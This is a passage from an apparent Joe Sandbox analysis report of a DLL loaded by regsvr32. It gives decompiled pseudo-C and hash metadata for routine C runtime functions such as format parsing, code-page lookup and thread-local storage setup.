                                                                                                    0x18001bfab
                                                                                                    0x18001bfb0
                                                                                                    0x18001bfbd
                                                                                                    0x18001bfe0

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: *
                                                                                                    • API String ID: 3215553584-163128923
                                                                                                    • Opcode ID: 065c42ea3199531b99717bee2724637d5897dee1c3bcf2b04cc524300318f562
                                                                                                    • Instruction ID: 9b8ababa67409382f1772c78d3a7cffc5b7b5e6a132153548de66b46db9d22a0
                                                                                                    • Opcode Fuzzy Hash: 065c42ea3199531b99717bee2724637d5897dee1c3bcf2b04cc524300318f562
                                                                                                    • Instruction Fuzzy Hash: 03715772104A58C6E7E68F25C4443AD3BA8F34DF9CF249129FB46C6294DF31C68ACB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001B5C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 63%
                                                                                                    			E0000000118001B5C8(signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t83;
				unsigned int _t91;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				signed int _t116;
				signed int _t119;
				unsigned int _t127;
				intOrPtr* _t144;
				void* _t151;
				signed int _t163;
				void* _t165;
				intOrPtr* _t166;

				_t163 = __rsi;
				_t144 = _t166;
				 *((long long*)(_t144 + 8)) = __rbx;
				 *((long long*)(_t144 + 0x10)) = __rsi;
				 *((long long*)(_t144 + 0x18)) = __rdi;
				 *((long long*)(_t144 + 0x20)) = __r14;
				_t151 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x8001b607;
				_t83 = E0000000118002E69C(_t144);
				 *_t144 = 0x16;
				E0000000118002E4F0(_t83);
				goto 0x8001b80e;
				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0x8001b5ef;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x8001b80b;
				_t119 = __edi | 0xffffffff;
				r14d = __rdi + 0x21;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x8001b7df;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 2;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001b7f8;
				if (( *(__rcx + 0x42) & 0x0000ffff) - r14w - 0x5a > 0) goto 0x8001b667;
				goto 0x8001b669;
				_t91 = ( *(_t144 + 0x8004b9e0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t91;
				if (_t91 == 8) goto 0x8001b829;
				_t127 = _t91;
				if (_t127 == 0) goto 0x8001b78f;
				if (_t127 == 0) goto 0x8001b77b;
				if (_t127 == 0) goto 0x8001b73c;
				if (_t127 == 0) goto 0x8001b70a;
				if (_t127 == 0) goto 0x8001b702;
				if (_t127 == 0) goto 0x8001b6d1;
				if (_t127 == 0) goto 0x8001b6c4;
				if (_t91 - 0xfffffffffffffffc != 1) goto 0x8001b839;
				E0000000118001FD64(__rcx, __rcx, __rdx, __rsi, _t165);
				goto 0x8001b7db;
				E0000000118001E218(_t144, __rcx);
				goto 0x8001b7db;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001b6e9;
				E0000000118001A118(__rcx, __rcx, __rcx + 0x38, _t163, _t165);
				goto 0x8001b7db;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t108 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				_t109 =  <  ? _t119 : _t108;
				 *(__rcx + 0x38) =  <  ? _t119 : _t108;
				goto 0x8001b7d9;
				 *(__rcx + 0x38) = 0;
				goto 0x8001b7df;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x8001b717;
				goto 0x8001b6dc;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t110 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				 *(__rcx + 0x34) = _t110;
				if (_t110 >= 0) goto 0x8001b7d9;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				 *(__rcx + 0x34) =  ~_t110;
				goto 0x8001b7d9;
				_t101 =  *(__rcx + 0x42) & 0x0000ffff;
				if (_t101 == r14d) goto 0x8001b775;
				if (_t101 == 0x23) goto 0x8001b76f;
				if (_t101 == 0x2b) goto 0x8001b769;
				if (_t101 == 0x2d) goto 0x8001b763;
				if (_t101 != 0x30) goto 0x8001b7df;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
				goto 0x8001b7df;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				goto 0x8001b7df;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
				goto 0x8001b7df;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | r14d;
				goto 0x8001b7df;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
				goto 0x8001b7df;
				 *(__rcx + 0x30) = _t163;
				 *((intOrPtr*)(__rcx + 0x40)) = sil;
				 *(__rcx + 0x38) = _t119;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
				 *((intOrPtr*)(__rcx + 0x54)) = sil;
				goto 0x8001b7df;
				r8d =  *(__rcx + 0x42) & 0x0000ffff;
				 *((char*)(__rcx + 0x54)) = 1;
				if (( *( *((intOrPtr*)(__rcx + 0x468)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8001b7b7;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)) + 8)) == _t163) goto 0x8001b7d6;
				if (E00000001180035B9C(r8w & 0xffffffff, __rcx,  *((intOrPtr*)(__rcx + 0x468))) != 0xffff) goto 0x8001b7d6;
				 *(_t151 + 0x28) = _t119;
				goto 0x8001b7d9;
				 *(_t151 + 0x28) =  *(_t151 + 0x28) + 1;
				if (1 == 0) goto 0x8001b839;
				_t116 =  *( *(_t151 + 0x18)) & 0x0000ffff;
				 *(_t151 + 0x42) = _t116;
				if (_t116 != 0) goto 0x8001b639;
				 *(_t151 + 0x18) =  &(( *(_t151 + 0x18))[1]);
				 *((intOrPtr*)(_t151 + 0x470)) =  *((intOrPtr*)(_t151 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t151 + 0x470)) != 2) goto 0x8001b62e;
				return  *(_t151 + 0x28);
			}
















                                                                                                    0x18001b5c8
                                                                                                    0x18001b5c8
                                                                                                    0x18001b5cb
                                                                                                    0x18001b5cf
                                                                                                    0x18001b5d3
                                                                                                    0x18001b5d7
                                                                                                    0x18001b5e3
                                                                                                    0x18001b5ed
                                                                                                    0x18001b5ef
                                                                                                    0x18001b5f4
                                                                                                    0x18001b5fa
                                                                                                    0x18001b602
                                                                                                    0x18001b60b
                                                                                                    0x18001b60d
                                                                                                    0x18001b61a
                                                                                                    0x18001b620
                                                                                                    0x18001b62a
                                                                                                    0x18001b62e
                                                                                                    0x18001b631
                                                                                                    0x18001b634
                                                                                                    0x18001b639
                                                                                                    0x18001b641
                                                                                                    0x18001b656
                                                                                                    0x18001b665
                                                                                                    0x18001b671
                                                                                                    0x18001b674
                                                                                                    0x18001b67a
                                                                                                    0x18001b680
                                                                                                    0x18001b682
                                                                                                    0x18001b68b
                                                                                                    0x18001b694
                                                                                                    0x18001b69d
                                                                                                    0x18001b6a2
                                                                                                    0x18001b6a7
                                                                                                    0x18001b6ac
                                                                                                    0x18001b6b1
                                                                                                    0x18001b6ba
                                                                                                    0x18001b6bf
                                                                                                    0x18001b6c7
                                                                                                    0x18001b6cc
                                                                                                    0x18001b6d6
                                                                                                    0x18001b6df
                                                                                                    0x18001b6e4
                                                                                                    0x18001b6e9
                                                                                                    0x18001b6f2
                                                                                                    0x18001b6f7
                                                                                                    0x18001b6fa
                                                                                                    0x18001b6fd
                                                                                                    0x18001b702
                                                                                                    0x18001b705
                                                                                                    0x18001b70f
                                                                                                    0x18001b715
                                                                                                    0x18001b717
                                                                                                    0x18001b720
                                                                                                    0x18001b723
                                                                                                    0x18001b728
                                                                                                    0x18001b72e
                                                                                                    0x18001b734
                                                                                                    0x18001b737
                                                                                                    0x18001b73c
                                                                                                    0x18001b743
                                                                                                    0x18001b748
                                                                                                    0x18001b74d
                                                                                                    0x18001b752
                                                                                                    0x18001b757
                                                                                                    0x18001b75d
                                                                                                    0x18001b761
                                                                                                    0x18001b763
                                                                                                    0x18001b767
                                                                                                    0x18001b769
                                                                                                    0x18001b76d
                                                                                                    0x18001b76f
                                                                                                    0x18001b773
                                                                                                    0x18001b775
                                                                                                    0x18001b779
                                                                                                    0x18001b77b
                                                                                                    0x18001b77f
                                                                                                    0x18001b783
                                                                                                    0x18001b786
                                                                                                    0x18001b789
                                                                                                    0x18001b78d
                                                                                                    0x18001b78f
                                                                                                    0x18001b794
                                                                                                    0x18001b7a8
                                                                                                    0x18001b7b5
                                                                                                    0x18001b7cf
                                                                                                    0x18001b7d1
                                                                                                    0x18001b7d4
                                                                                                    0x18001b7d6
                                                                                                    0x18001b7dd
                                                                                                    0x18001b7e3
                                                                                                    0x18001b7e6
                                                                                                    0x18001b7ed
                                                                                                    0x18001b7f3
                                                                                                    0x18001b7f8
                                                                                                    0x18001b805
                                                                                                    0x18001b828

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: *
                                                                                                    • API String ID: 3215553584-163128923
                                                                                                    • Opcode ID: f122251ed82217d059e89fe5e7827f29cac33817a1155de3ccd88e8e79968025
                                                                                                    • Instruction ID: 10b0ab8e3fad6467b70c8d2d1aa2a6b86b4f8d0d1ab442aeb7f2165746060626
                                                                                                    • Opcode Fuzzy Hash: f122251ed82217d059e89fe5e7827f29cac33817a1155de3ccd88e8e79968025
                                                                                                    • Instruction Fuzzy Hash: 0D71A672104A58C6E7EA9F29C0453AC3BA8F75DFD8F149116FA46C66D8DF34CA89C710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018000F964 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E0000000118000F964(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t26;
				intOrPtr _t36;
				intOrPtr _t45;
				intOrPtr* _t58;
				long long _t65;
				long long _t82;
				signed int _t83;
				intOrPtr* _t84;
				void* _t87;
				void* _t90;

				_a8 = __rbx;
				r14d = __ecx;
				if (__rcx - 1 - 1 <= 0) goto 0x8000f99a;
				_t26 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t26);
				goto 0x8000fabe;
				E0000000118002FFD0();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t84 =  *0x8005ea60; // 0xc33350
				 *0x8005ea70 = 0x8005e2f0;
				if (_t84 == 0) goto 0x8000f9d1;
				if ( *_t84 != dil) goto 0x8000f9d4;
				_t58 =  &_a32;
				_a24 = _t83;
				_v56 = _t58;
				r8d = 0;
				_a32 = _t83;
				E0000000118000FC58(0x8005e2f0, 0x8005e2f0, 0x8005e2f0, _t83, 0x8005e2f0, _t87, _t90,  &_a24);
				r8d = 1;
				E00000001180010168(_a24, _a32, _t90);
				_t65 = _t58;
				if (_t58 != 0) goto 0x8000fa20;
				E0000000118002E69C(_t58);
				_t10 = _t65 + 0xc; // 0xc
				_t45 = _t10;
				 *_t58 = _t45;
				goto 0x8000fa5a;
				_v56 =  &_a32;
				E0000000118000FC58(_t65, 0x8005e2f0, _t65, _t83, 0x8005e2f0, _t87, _t58 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x8000fa5e;
				_t36 = _a24 - 1;
				 *0x8005ea4c = _t36;
				 *0x8005ea50 = _t65;
				goto 0x8000fab4;
				_a16 = _t83;
				0x8002f7cc();
				if (_t36 == 0) goto 0x8000fa7a;
				goto 0x8000faab;
				_t82 = _a16;
				if ( *_t82 == _t83) goto 0x8000fa95;
				if ( *((intOrPtr*)(_t82 + 8)) != _t83) goto 0x8000fa89;
				 *0x8005ea4c = 0;
				 *0x8005ea50 = _t82;
				_a16 = _t83;
				E0000000118002E8A0(_t82 + 8, _t83);
				_a16 = _t83;
				E0000000118002E8A0(_t82 + 8, _t83);
				return _t45;
			}

















                                                                                                    0x18000f964
                                                                                                    0x18000f97a
                                                                                                    0x18000f980
                                                                                                    0x18000f982
                                                                                                    0x18000f98c
                                                                                                    0x18000f98e
                                                                                                    0x18000f995
                                                                                                    0x18000f99a
                                                                                                    0x18000f9a6
                                                                                                    0x18000f9b1
                                                                                                    0x18000f9b7
                                                                                                    0x18000f9c0
                                                                                                    0x18000f9ca
                                                                                                    0x18000f9cf
                                                                                                    0x18000f9d4
                                                                                                    0x18000f9d8
                                                                                                    0x18000f9e0
                                                                                                    0x18000f9e5
                                                                                                    0x18000f9e8
                                                                                                    0x18000f9f1
                                                                                                    0x18000f9fa
                                                                                                    0x18000fa07
                                                                                                    0x18000fa0c
                                                                                                    0x18000fa12
                                                                                                    0x18000fa14
                                                                                                    0x18000fa19
                                                                                                    0x18000fa19
                                                                                                    0x18000fa1c
                                                                                                    0x18000fa1e
                                                                                                    0x18000fa32
                                                                                                    0x18000fa37
                                                                                                    0x18000fa40
                                                                                                    0x18000fa45
                                                                                                    0x18000fa47
                                                                                                    0x18000fa50
                                                                                                    0x18000fa5c
                                                                                                    0x18000fa62
                                                                                                    0x18000fa69
                                                                                                    0x18000fa72
                                                                                                    0x18000fa78
                                                                                                    0x18000fa7a
                                                                                                    0x18000fa87
                                                                                                    0x18000fa93
                                                                                                    0x18000fa95
                                                                                                    0x18000faa0
                                                                                                    0x18000faa7
                                                                                                    0x18000faab
                                                                                                    0x18000fab0
                                                                                                    0x18000fab7
                                                                                                    0x18000face

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                    • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                    • API String ID: 3307058713-464481000
                                                                                                    • Opcode ID: c485b174449bfd9ff9b3ac5250fec131de9bf12cc24a3e93ba5bb2069951ac92
                                                                                                    • Instruction ID: 155137de94a623c8f990651ce39a33a271f532faec8f6d94bc70d04b4c684d3a
                                                                                                    • Opcode Fuzzy Hash: c485b174449bfd9ff9b3ac5250fec131de9bf12cc24a3e93ba5bb2069951ac92
                                                                                                    • Instruction Fuzzy Hash: C1416D72200B9886EBA6DF25A8413E87794F74EBC4F548032FD4D47B95DE39C6898301
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800316F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleType
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3000768030-2766056989
                                                                                                    • Opcode ID: b08e5082cc6ac8107e62d087a8ad29e8dd1907e819a8d8424fbc3f99c964760a
                                                                                                    • Instruction ID: 7ddc56256808ef6c03d77842a620ee1d188e8ff579ef2cc1dbbf850c423794db
                                                                                                    • Opcode Fuzzy Hash: b08e5082cc6ac8107e62d087a8ad29e8dd1907e819a8d8424fbc3f99c964760a
                                                                                                    • Instruction Fuzzy Hash: D721D732608B8544EBA78B3594903EA27A1E74DBB5F2E5305F66A077D4CE35CA89C340
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 74%
                                                                                                    			E00000001180040520(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r9, char _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t31;
				intOrPtr* _t33;
				void* _t43;

				_t46 = __rbp;
				_t44 = __rsi;
				_a16 = __rbx;
				_a24 = __rsi;
				_t43 = __rdx;
				_t33 = __rcx;
				if (__rcx == 0) goto 0x80040592;
				if ( *__rcx == 0) goto 0x80040592;
				if (E000000011800444E4( *__rcx, __rcx, 0x80052370) == 0) goto 0x80040592;
				if (E000000011800444E4(E000000011800444E4( *__rcx, __rcx, 0x80052370), __rcx, 0x80052378) != 0) goto 0x80040588;
				_t3 = _t43 + 0x258; // 0x2f0
				_t4 = _t44 + 2; // 0x2
				r9d = _t4;
				if (E0000000118002D69C(0x2000000b, E000000011800444E4(E000000011800444E4( *__rcx, __rcx, 0x80052370), __rcx, 0x80052378), __rcx, _t3, __rdx, __rsi, __rbp,  &_a8) == 0) goto 0x800405b2;
				goto 0x800405c4;
				E0000000118002B9A0(_t31, _t33);
				goto 0x800405c4;
				_t7 = _t43 + 0x258; // 0x2f0
				r9d = 2;
				if (E0000000118002D69C(0x20001004, E0000000118002D69C(0x2000000b, E000000011800444E4(E000000011800444E4( *__rcx, __rcx, 0x80052370), __rcx, 0x80052378), __rcx, _t3, __rdx, __rsi, __rbp,  &_a8), _t33, _t7, _t43, _t44, _t46,  &_a8) != 0) goto 0x800405b6;
				goto 0x800405c4;
				if (_a8 != 0) goto 0x800405c4;
				return GetACP();
			}







                                                                                                    0x180040520
                                                                                                    0x180040520
                                                                                                    0x180040520
                                                                                                    0x180040525
                                                                                                    0x180040531
                                                                                                    0x180040534
                                                                                                    0x18004053a
                                                                                                    0x18004053f
                                                                                                    0x18004054f
                                                                                                    0x180040562
                                                                                                    0x180040564
                                                                                                    0x180040570
                                                                                                    0x180040570
                                                                                                    0x180040580
                                                                                                    0x180040586
                                                                                                    0x18004058b
                                                                                                    0x180040590
                                                                                                    0x180040592
                                                                                                    0x180040599
                                                                                                    0x1800405b0
                                                                                                    0x1800405b4
                                                                                                    0x1800405bc
                                                                                                    0x1800405d3

                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,?,000000A0,0000000180040836,?,?,?,?,?,0000000180036E74), ref: 00000001800405BE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 0-711371036
                                                                                                    • Opcode ID: 777cabf62b5bc8fe811edaf1c8a322129d352ba9a6c7ab277cc674e524059747
                                                                                                    • Instruction ID: af56032aa0533dfbaa37eb6e41da76c548af3b2a19cd57fdcdb06e1f2c53d802
                                                                                                    • Opcode Fuzzy Hash: 777cabf62b5bc8fe811edaf1c8a322129d352ba9a6c7ab277cc674e524059747
                                                                                                    • Instruction Fuzzy Hash: E7118671215F4981FAE6D721A4817DB6360FB4C7C8F65C411BA46A3686DF38CB49CF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002DDF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 37%
                                                                                                    			E0000000118002DDF8(long long _a8, long long _a16) {
				void* _t12;
				long long _t14;
				void* _t17;
				long long _t22;

				_a8 = _t14;
				_a16 = _t22;
				E0000000118002CDF4(0x1f, _t14, "SystemFunction036", _t17, "\r", "SystemFunction036");
				if (_t12 == 0) goto 0x8002de56;
				 *0x8004a430();
				goto __rax;
			}







                                                                                                    0x18002ddf8
                                                                                                    0x18002ddfd
                                                                                                    0x18002de26
                                                                                                    0x18002de31
                                                                                                    0x18002de36
                                                                                                    0x18002de53

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort
                                                                                                    • String ID: SetThreadStackGuarantee$SystemFunction036
                                                                                                    • API String ID: 4206212132-2910880125
                                                                                                    • Opcode ID: 2ba54f4d6525b6131183243a71ca7b94710a7e8f8beed4c10071742397aaa5de
                                                                                                    • Instruction ID: 7e432847eacabb96cb9901d1846eac2485e8d73df0bae0a86f1d5bfd916564b5
                                                                                                    • Opcode Fuzzy Hash: 2ba54f4d6525b6131183243a71ca7b94710a7e8f8beed4c10071742397aaa5de
                                                                                                    • Instruction Fuzzy Hash: D7117C31715A8882EE87DB56F5947E86360BBCCBC8F89C036BE1907755DE78C6498304
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002E834 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: msvcrt.dll
                                                                                                    • API String ID: 1646373207-370904613
                                                                                                    • Opcode ID: a69bf0b0dcac61b850642748728914c62fe42252ab87ebf3641d548e5d709ff1
                                                                                                    • Instruction ID: f94145327ffb9b001922e7ede3c88c50cbe0d5ad5d5cf428262bc53d461589e3
                                                                                                    • Opcode Fuzzy Hash: a69bf0b0dcac61b850642748728914c62fe42252ab87ebf3641d548e5d709ff1
                                                                                                    • Instruction Fuzzy Hash: 20F09030605E4C81FED38B51F8943A513A0BB8D7C4F459025F80D073A0EF38CA98C304
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180049100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassCursorLoadRegister
                                                                                                    • String ID: P
                                                                                                    • API String ID: 1693014935-3110715001
                                                                                                    • Opcode ID: 350bef43a8a20f1740283129047526d9ceaf8bf11c415aa63c1780b6368675e7
                                                                                                    • Instruction ID: 471714767661d04ec433d5d623e64439d1a6ce681cb03d5018c82c5a27d5d783
                                                                                                    • Opcode Fuzzy Hash: 350bef43a8a20f1740283129047526d9ceaf8bf11c415aa63c1780b6368675e7
                                                                                                    • Instruction Fuzzy Hash: DEF0E732518F8586E7618F54F88135AB3A8F78D749F644228F6DD42B28EF7CC258CB48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800077D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 27%
                                                                                                    			E000000011800077D8(void* __ecx, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long _a8) {
				void* _t12;
				void* _t19;

				_t12 = __rax;
				_a8 = __rbx;
				E0000000118000727C(3, __rdx, "FlsSetValue", _t19, 0x8004a7b8, "FlsSetValue");
				if (_t12 == 0) goto 0x80007818;
				 *0x8004a438();
				goto 0x8000781e;
				return TlsSetValue(??, ??);
			}





                                                                                                    0x1800077d8
                                                                                                    0x1800077d8
                                                                                                    0x180007801
                                                                                                    0x18000780e
                                                                                                    0x180007810
                                                                                                    0x180007816
                                                                                                    0x180007828

                                                                                                    APIs
                                                                                                    • try_get_function.LIBVCRUNTIME ref: 0000000180007801
